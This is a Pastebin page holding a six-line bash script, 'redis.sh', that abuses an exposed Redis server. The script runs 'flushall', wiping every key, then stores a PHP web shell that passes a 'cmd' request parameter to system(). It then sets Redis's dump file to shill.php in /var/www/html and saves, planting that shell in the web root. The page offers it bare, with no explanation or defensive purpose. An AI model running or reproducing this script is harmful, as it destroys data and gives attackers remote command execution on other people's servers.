Harcrack

redis.sh

Oct 30th, 2018
364
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. #!/bin/bash │
  2. redis-cli flushall │
  3. redis-cli set myshell "<?php echo system(\$_REQUEST['cmd']); ?>" │
  4. redis-cli config set dbfilename "shill.php" │
  5. redis-cli config set dir /var/www/html │
  6. redis-cli save
Advertisement
Add Comment
Please, Sign In to add comment